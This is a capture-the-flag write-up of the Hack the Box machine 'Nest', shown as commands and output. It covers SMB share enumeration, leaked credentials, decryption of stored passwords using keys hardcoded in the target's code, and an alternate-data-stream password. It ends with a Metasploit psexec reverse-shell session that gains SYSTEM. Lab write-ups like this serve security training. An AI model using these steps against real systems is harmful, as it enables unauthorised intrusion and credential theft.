This is one of my favorite Hack the Box machines, throughout my time completing them! I absolutely enjoyed every minute of this box.
My first NMAP scan, running with multiple flags, failed. I performed a simple nmap scan, and it returned only one port open:
```
nmap 10.10.10.178
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-28 09:25 CST
Nmap scan report for 10.10.10.178
Host is up (0.043s latency).
Not shown: 999 filtered ports
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 5.41 seconds
```
With port 445 open, I then ran a scan against SMB. Server Message Block (SMB, which Samba implements on Linux) is a way for Windows to share files, printers, serial ports and communications abstractions such as named pipes and mail slots between computers.
```
smbclient -L //10.10.10.178
Enter WORKGROUP\root's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk
        IPC$            IPC       Remote IPC
        Secure$         Disk
        Users           Disk
SMB1 disabled -- no workgroup available
```
The smbclient command showed that there were several network shares. Smbclient is a tool used for Samba, providing an FTP-like experience for users. I went through and connected to each, and found that I was able to log in to the Users share and find possible usernames. I took note of this, as this information is sure to come up later for this box:
```
smbclient \\\\10.10.10.178\\Users
Enter WORKGROUP\root's password:
smb: \> dir
  .                                   D        0  Sat Jan 25 17:04:21 2020
  ..                                  D        0  Sat Jan 25 17:04:21 2020
  Administrator                       D        0  Fri Aug  9 10:08:23 2019
  C.Smith                             D        0  Sun Jan 26 01:21:44 2020
  L.Frost                             D        0  Thu Aug  8 12:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 12:02:50 2019
  TempUser                            D        0  Wed Aug  7 17:55:56 2019

                10485247 blocks of size 4096. 6449754 blocks available
```
I did attempt to access each of the user directories listed, but access was denied for every one of them. Continuing my enumeration of the network shares, I connected to Data, and found I could get into the Shared directory:
```
smbclient \\\\10.10.10.178\\Data
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Aug  7 17:53:46 2019
  ..                                  D        0  Wed Aug  7 17:53:46 2019
  IT                                  D        0  Wed Aug  7 17:58:07 2019
  Production                          D        0  Mon Aug  5 16:53:38 2019
  Reports                             D        0  Mon Aug  5 16:53:44 2019
  Shared                              D        0  Wed Aug  7 14:07:51 2019

                10485247 blocks of size 4096. 6449754 blocks available
smb: \Reports\> cd ..\Shared
smb: \Shared\> dir
  .                                   D        0  Wed Aug  7 14:07:51 2019
  ..                                  D        0  Wed Aug  7 14:07:51 2019
  Maintenance                         D        0  Wed Aug  7 14:07:32 2019
  Templates                           D        0  Wed Aug  7 14:08:07 2019

                10485247 blocks of size 4096. 6449754 blocks available
```
In the Maintenance directory, I found a file, Maintenance Alerts.txt. I used the get command to download the file to my local box, and viewed the file on my Kali Linux machine:
```
smb: \Shared\Maintenance\> dir
  .                                   D        0  Wed Aug  7 14:07:32 2019
  ..                                  D        0  Wed Aug  7 14:07:32 2019
  Maintenance Alerts.txt              A       48  Mon Aug  5 18:01:44 2019

                10485247 blocks of size 4096. 6449754 blocks available
smb: \Shared\Maintenance\> get "Maintenance Alerts.txt"
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
root@bhax0r:~# cat 'Maintenance Alerts.txt'
There is currently no scheduled maintenance work
```
However, still nothing! I then went up one directory, changed into the Templates directory, and found another file, Welcome Email.txt. This sounded promising:
```
smb: \Shared\Templates\HR\> dir
  .                                   D        0  Wed Aug  7 14:08:01 2019
  ..                                  D        0  Wed Aug  7 14:08:01 2019
  Welcome Email.txt                   A      425  Wed Aug  7 17:55:36 2019

                10485247 blocks of size 4096. 6449754 blocks available
smb: \Shared\Templates\HR\> get "Welcome Email.txt"
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (2.4 KiloBytes/sec) (average 0.9 KiloBytes/sec)
root@hax0r:~# cat 'Welcome Email.txt'
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019

Thank you
```
And I found a possible set of credentials, tempuser:welcome2019! Noting the Users directory earlier, I logged back in with these credentials to that network share:
```
smbclient \\\\10.10.10.178\\Users -U TempUser
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> cd TempUser
smb: \TempUser\> dir
  .                                   D        0  Wed Aug  7 17:55:56 2019
  ..                                  D        0  Wed Aug  7 17:55:56 2019
  New Text Document.txt               A        0  Wed Aug  7 17:55:56 2019

                10485247 blocks of size 4096. 6449754 blocks available
smb: \TempUser\> get "New Text Document.txt"
getting file \TempUser\New Text Document.txt of size 0 as New Text Document.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
root@hax0r:~# cat 'New Text Document.txt'
```
However, this did not have any further information for me. I then attempted to log in to the Users share with the other usernames, using the same password (users don't always change default passwords), but this approach also did not work. So, I moved on and used these credentials against the other shares. I did find that they allowed me into Secure$:
```
smbclient \\\\10.10.10.178\\Secure$ -U TempUser
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Aug  7 18:08:12 2019
  ..                                  D        0  Wed Aug  7 18:08:12 2019
  Finance                             D        0  Wed Aug  7 14:40:13 2019
  HR                                  D        0  Wed Aug  7 18:08:11 2019
  IT                                  D        0  Thu Aug  8 05:59:25 2019

                10485247 blocks of size 4096. 6449738 blocks available
```
But there was nothing within that network share that I could use to my advantage. Moving on, I was able to log in to the Data share with the TempUser credentials, and found two interesting files in this share, RU_config.xml and config.xml:
```
smb: \IT\Configs\RU Scanner\> ls
  .                                   D        0  Wed Aug  7 15:01:13 2019
  ..                                  D        0  Wed Aug  7 15:01:13 2019
  RU_config.xml                       A      270  Thu Aug  8 14:49:37 2019

                10485247 blocks of size 4096. 6449935 blocks available
smb: \IT\Configs\RU Scanner\> get RU_config.xml
getting file \IT\Configs\RU Scanner\RU_config.xml of size 270 as RU_config.xml (1.5 KiloBytes/sec) (average 17.6 KiloBytes/sec)
root@hax0r:~# cat RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
```
```
smb: \IT\Configs\NotepadPlusPlus\> ls
  .                                   D        0  Wed Aug  7 14:31:37 2019
  ..                                  D        0  Wed Aug  7 14:31:37 2019
  config.xml                          A     6451  Wed Aug  7 18:01:25 2019
  shortcuts.xml                       A     2108  Wed Aug  7 14:30:27 2019

                10485247 blocks of size 4096. 6449935 blocks available
smb: \IT\Configs\NotepadPlusPlus\> get config.xml
getting file \IT\Configs\NotepadPlusPlus\config.xml of size 6451 as config.xml (37.5 KiloBytes/sec) (average 23.4 KiloBytes/sec)
root@hax0r:~# cat config.xml
...
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
    <File filename="C:\windows\System32\drivers\etc\hosts" />
    <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
    <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
...
```
Neither of these looked like much at first, but both hold relevant and important information. First off, we have a username and an encrypted password from RU_config.xml. The second is easily missed: the second File filename entry in the Notepad++ config.xml shows that in the Secure$ share there is a Carl directory within the IT directory, even though the IT directory could not be listed earlier. In RU_config.xml the credentials belong to c.smith; could this be Carl!?
I logged in and attempted to see if I could get to the Carl directory:
```
smbclient \\\\10.10.10.178\\Secure$ -U TempUser
Enter WORKGROUP\TempUser's password: welcome2019
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Aug  7 18:08:12 2019
  ..                                  D        0  Wed Aug  7 18:08:12 2019
  Finance                             D        0  Wed Aug  7 14:40:13 2019
  HR                                  D        0  Wed Aug  7 18:08:11 2019
  IT                                  D        0  Thu Aug  8 05:59:25 2019

                10485247 blocks of size 4096. 6449738 blocks available
smb: \> cd IT
smb: \IT\> dir
NT_STATUS_ACCESS_DENIED listing \IT\*
smb: \IT\> cd Carl
smb: \IT\Carl\> dir
  .                                   D        0  Wed Aug  7 14:42:14 2019
  ..                                  D        0  Wed Aug  7 14:42:14 2019
  Docs                                D        0  Wed Aug  7 14:44:00 2019
  Reports                             D        0  Tue Aug  6 08:45:40 2019
  VB Projects                         D        0  Tue Aug  6 09:41:55 2019
```
And that worked! Note above that while I was in the Secure$\IT directory I could not list its contents, but I could still change into the Carl directory because I knew its name. Awesome! Enumerating these files, I found an RUScanner project in the VB Projects directory:
```
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> dir
  .                                   D        0  Wed Aug  7 17:05:54 2019
  ..                                  D        0  Wed Aug  7 17:05:54 2019
  bin                                 D        0  Wed Aug  7 15:00:11 2019
  ConfigFile.vb                       A      772  Wed Aug  7 17:05:09 2019
  Module1.vb                          A      279  Wed Aug  7 17:05:44 2019
  My Project                          D        0  Wed Aug  7 15:00:11 2019
  obj                                 D        0  Wed Aug  7 15:00:11 2019
  RU Scanner.vbproj                   A     4828  Fri Aug  9 10:37:51 2019
  RU Scanner.vbproj.user              A      143  Tue Aug  6 07:55:27 2019
  SsoIntegration.vb                   A      133  Wed Aug  7 17:05:58 2019
  Utils.vb                            A     4888  Wed Aug  7 14:49:35 2019

                10485247 blocks of size 4096. 6449951 blocks available
```
Looking at the Utils.vb file, there are encrypting and decrypting functions. Looking at how these functions work, there is a reference to symmetric key creation using Rfc2898DeriveBytes. Instead of trying to break this encryption, I took the complete file structure and copied it to a Windows machine. Once I had it locally, I was able to compile the code using Visual Studio.
Once it was compiled and I attempted to run the file, there was an error message:
```
Unhandled Exception: System.IO.FileNotFoundException: Could not find file 'C:\Users\adalzell\Desktop\Nest\RUScanner\bin\Debug\RU_Config.xml'
```
Since I already had the RU_config.xml file, which contains the password string that looked like base64, I placed that file into the bin\Debug directory, and when I ran it again the program completed without any exceptions. I then added a single line of code to the Decrypt function in Utils.vb to write the plain text to the console:
```vb
Public Shared Function Decrypt(ByVal cipherText As String, _
...
    Console.WriteLine(plainText)
    Return plainText
...
```
And with that, when I compiled and ran the code again, the plain text password was printed to the console.
Now, I am able to connect to the Users share and own user:
```
smbclient \\\\10.10.10.178\\Users -U C.Smith
Enter WORKGROUP\C.Smith's password: xRxRxPANCAK3SxRxRx
smb: \> cd C.Smith
smb: \C.Smith\> ls
  .                                   D        0  Sun Jan 26 01:21:44 2020
  ..                                  D        0  Sun Jan 26 01:21:44 2020
  HQK Reporting                       D        0  Thu Aug  8 18:06:17 2019
  user.txt                            A       32  Thu Aug  8 18:05:24 2019

                10485247 blocks of size 4096. 6449757 blocks available
smb: \C.Smith\> get user.txt
getting file \C.Smith\user.txt of size 32 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
root@hax0r:~# cat user.txt
xxxxxxxxxxxxxxx4fd827e05f426e987
```
Now to move on to own root. I looked in the HQK Reporting directory, and found a password file:
```
smb: \C.Smith\HQK Reporting\> ls
  .                                   D        0  Thu Aug  8 18:06:17 2019
  ..                                  D        0  Thu Aug  8 18:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 07:18:42 2019
  Debug Mode Password.txt             A        0  Thu Aug  8 18:08:17 2019
  HQK_Config_Backup.xml               A      249  Thu Aug  8 18:09:05 2019

                10485247 blocks of size 4096. 6449725 blocks available
```
But it was empty. That would have been too easy! However, looking at the file attributes with allinfo, there is a named stream attached to the file, so I retrieved that Alternate Data Stream (ADS) to get the password:
```
smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 06:06:12 PM 2019 CDT
access_time:    Thu Aug  8 06:06:12 PM 2019 CDT
write_time:     Thu Aug  8 06:08:17 PM 2019 CDT
change_time:    Thu Aug  8 06:08:17 PM 2019 CDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password"
root@hax0r:~# cat "/root/Debug Mode Password.txt:Password"
WBQ201953D8w
```
With this password, I can telnet into the box and enable Debug mode:
```
telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>debug WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
```
Still connected in this telnet session, I enumerated the service's directories. Going up one directory and into the LDAP directory, I found a config file:
```
>list

Use the query ID numbers below with the RUNQUERY command
and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
```
Attempting to decrypt this value the same way as the RU_config.xml password returned a padding error. Looking further into HqkLdap.exe, I found the following code in the CR class:
```vb
' HqkLdap.CR
' Token: 0x06000012 RID: 18 RVA: 0x00002278 File Offset: 0x00000678
Public Shared Function DS(EncryptedString As String) As String
    If String.IsNullOrEmpty(EncryptedString) Then
        Return String.Empty
    End If
    Return CR.RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)
End Function
```
This is a different set of encryption parameters: a different passphrase, salt, iteration count and IV. So, I placed these into the Decrypt function of my compiled DbPof.exe, put the Administrator's encrypted value into the RU_config.xml file, reran DbPof.exe from the command prompt, and got the Administrator password!
```
DbPof.exe
XtH4nkS4Pl4y1nGX
```
I connected to the Users share as Administrator, but the Administrator directory only held a shortcut link to the admin's desktop, which was no good. So, after multiple failed attempts with evil-winrm, Impacket's psexec.py, and winexe, I used Metasploit's psexec module with a reverse_tcp payload:
```
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf5 exploit(windows/smb/psexec) > set LPORT 4538
LPORT => 4538
msf5 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.178
RHOSTS => 10.10.10.178
msf5 exploit(windows/smb/psexec) > set SMBUser
SMBUser =>
msf5 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf5 exploit(windows/smb/psexec) > set SMBPass XtH4nkS4Pl4y1nGX
SMBPass => XtH4nkS4Pl4y1nGX
msf5 exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 10.10.14.13:4538
[*] 10.10.10.178:445 - Connecting to the server...
[*] 10.10.10.178:445 - Authenticating to 10.10.10.178:445 as user 'Administrator'...
[*] 10.10.10.178:445 - Selecting PowerShell target
[*] 10.10.10.178:445 - Executing the payload...
[+] 10.10.10.178:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (180291 bytes) to 10.10.10.178
[*] Meterpreter session 1 opened (10.10.14.13:4538 -> 10.10.10.178:49157) at 2020-01-29 14:28:29 -0600

meterpreter > shell
Process 1456 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd C:\users\administrator\desktop
cd C:\users\administrator\desktop

C:\Users\Administrator\Desktop>more root.txt
more root.txt
xxxxxxxxxxxxxxxxxxx08a42f0b94b878c41
```
And that rooted the box! The name, Nest, really fits this complex chain of steps, each one nested inside the previous. Thanks for reading!